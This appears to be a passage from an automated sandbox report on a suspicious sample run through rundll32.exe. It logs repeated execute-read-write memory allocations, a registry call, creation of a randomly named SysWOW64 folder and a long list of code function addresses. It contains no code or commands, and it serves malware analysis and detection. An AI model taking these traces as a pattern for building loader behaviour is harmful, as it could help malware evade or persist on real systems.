                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00771328 NtSetInformationKey,
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Kvmkgtcj\Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00417D7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004189F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00414E4B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040704B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040D44C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0041C04C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00405856
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00401658
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00411259
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00418668
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040C07D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00407605
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040620A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0041F411
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040F813
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040D013
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00408816
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040421E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0041C424
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00402628
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00404A2B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040DC2F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00418831
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00407E34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040A83A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040903F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004106C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00409CC8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0041D2CB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040D0DE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00409AE1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004142E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0041DEE8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004094EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040C6EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00414693
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0041CAA0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00404EA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00408CA3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0041C6AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004056B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00415AB8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00405EB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040CB42
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00416B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0041654F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00403D4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00418F65
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00412965
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0041676B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00410F6D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00411B71
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00417570
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040A176
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0041DD78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00413D7C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040CF11
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00415115
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0041231B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0041BF25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0041DB25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040492A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0041D530
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040213E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00406BC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004173C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004177C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00419DC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004193C9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0041CDCC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0040ADCE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0041B1D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00404BDE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00405BE1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00402DEE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004137F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0041B3FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0041E19F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004199A4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00415DAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0041EDB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00168217
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017C014
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00173C07
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017C83F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0016923C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00164C27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017BC21
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017502C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0016542D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00173856
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00169055
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0016C652
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017D45C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0016BC63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00168A60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00163E9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017B499
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017D099
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0016C485
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017188F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00174689
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0016C0B6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001616B2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001710BB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001760B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00175CDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00171ED9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001784D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00175AC3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001632C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001772F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001732F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001710E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00176AE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001704E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017D2EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017D713
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017531E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00178F18
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00166134
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00176934
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00176D34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017893D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017E32D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00165155
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00164152
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017A746
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017C340
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017A972
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0016577E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00166B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00162362
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00177F6A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00163F9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00161B9C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017B998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0016ED87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0016C587
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017E985
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00167D8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001685B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001743BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001665BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00177DA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0016D1A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00169DAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00169DAD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001673A8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00177BDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0016C9C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017B5C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00160BCC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00164DCA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0016B5F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0043303C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00441E14
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071903F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071DC2F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071620A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00719CC8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071A176
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00723D7C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00727D7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072654F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071492A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007289F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007237F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072B3FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007293C9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071C07D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00728668
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00715856
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00711658
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00721259
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00724E4B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071704B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071D44C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072C04C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00728831
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00717E34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071A83A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072C424
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00712628
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00714A2B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071F813
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071D013
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072F411
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00718816
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071421E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00717605
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007242E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00719AE1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072DEE8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007194EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071C6EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071D0DE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007206C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072D2CB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007156B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00715EB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00725AB8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00714EA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072CAA0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00718CA3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072C6AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00724693
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00727570
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00721B71
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072DD78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00728F65
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00722965
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072676B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00720F6D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071CB42
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00726B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00713D4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072D530
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071213E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072BF25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072DB25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071CF11
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00725115
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072231B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00715BE1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00712DEE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072B1D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00714BDE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00716BC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007273C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007277C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00729DC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072CDCC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071ADCE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072EDB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007299A4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00725DAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072E19F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00264C27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0027BC21
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0027502C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0026542D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0027C83F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0026923C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00273C07
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00268217
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0027C014
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0026BC63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00268A60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00273856
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00269055
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0026C652
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0027D45C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0026C0B6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002616B2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002710BB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002760B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0026C485
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0027188F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00274689
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00263E9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0027B499
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0027D099
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002710E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00276AE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002704E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0027D2EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002772F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002732F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00275AC3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002632C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00275CDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00271ED9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002784D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0027E32D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00266134
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00276934
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00276D34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0027893D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0027D713
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0027531E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00278F18
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00262362
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00277F6A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0027A972
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0026577E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00266B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0027A746
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0027C340
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00265155
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00264152
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00277DA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0026D1A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00269DAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00269DAD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002673A8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002685B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002743BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002665BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0026ED87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0026C587
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0027E985
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00267D8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00263F9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00261B9C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0027B998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0026B5F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0026C9C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0027B5C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00260BCC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00264DCA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00277BDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0074303C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00751E14
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00357D7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003589F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00347E34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00358831
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034903F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034A83A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035C424
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034DC2F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00342628
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00344A2B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00348816
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035F411
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034F813
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034D013
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034421E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00347605
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034620A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034C07D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00358668
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00345856
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00341658
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00351259
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034D44C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035C04C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00354E4B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034704B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003456B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00355AB8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00345EB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035CAA0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00344EA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00348CA3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035C6AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00354693
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00349AE1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003542E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003494EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034C6EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035DEE8
